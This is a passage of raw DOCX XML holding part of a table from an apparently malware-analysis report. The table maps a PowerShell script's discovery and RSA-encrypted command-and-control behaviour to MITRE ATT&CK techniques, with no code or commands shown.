          <w:p w14:paraId="01382B10" w14:textId="1805ECB6" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D8AF4C" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DC9D014" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32404990" w14:textId="1168FABE" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6752D8ED" w14:textId="006744A9" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00153786" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">See [2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> example above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00ED5880" w14:paraId="741BDEF9" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C4D7BC4" w14:textId="2ED76FFB" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED5D68">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6391CC77" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B5DEF42" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1016 System Network Configuration Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DB0A4C0" w14:textId="3A1F1BC2" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CAD1145" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267C74C3" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F981783" w14:textId="03680BC4" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58CAB8AE" w14:textId="56F2D0F7" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00153786" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">See [2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> example above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00ED5880" w14:paraId="786FB0DF" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C45E8A5" w14:textId="1C715906" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00ED5D68">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50FAFB40" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA007 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4785A316" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1049 System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CCE5EDA" w14:textId="707A86D0" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4419C58F" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BBCDC3D" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0759C91C" w14:textId="49980F48" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A84EC73" w14:textId="3C477C2E" w:rsidR="00345E09" w:rsidRPr="00ED5880" w:rsidRDefault="00153786" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">See [2] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> example above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w14:paraId="0108B4BC" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683B956B" w14:textId="0B50E51A" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50E0208F" w14:textId="77777777" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="414DDD00" w14:textId="77777777" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1573.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Encrypted Channel: Asymmetric Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="632414AD" w14:textId="436097ED" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A3A1C37" w14:textId="77777777" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22597559" w14:textId="77777777" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF7AB7A" w14:textId="64D57D82" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="247A407D" w14:textId="77777777" w:rsidR="00EF6B51" w:rsidRPr="00EF6B51" w:rsidRDefault="00EF6B51" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] The second section of the PowerShell script has </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF6B51">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345E09" w:rsidRPr="00B857D7" w14:paraId="34B5C616" w14:textId="77777777" w:rsidTr="00EE77AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DA78215" w14:textId="5F253FD8" w:rsidR="00345E09" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E364A8E" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2910" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D6E4C7" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1613932B" w14:textId="065B5DF6" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00666C43">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08018941" w14:textId="77777777" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00345E09" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DFB31AB" w14:textId="4D3DAABD" w:rsidR="00345E09" w:rsidRDefault="00666C43" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68AD49A8" w14:textId="6D3CD3F1" w:rsidR="00345E09" w:rsidRPr="00B857D7" w:rsidRDefault="00527497" w:rsidP="00432976">
            <w:pPr>
              <w:rPr>
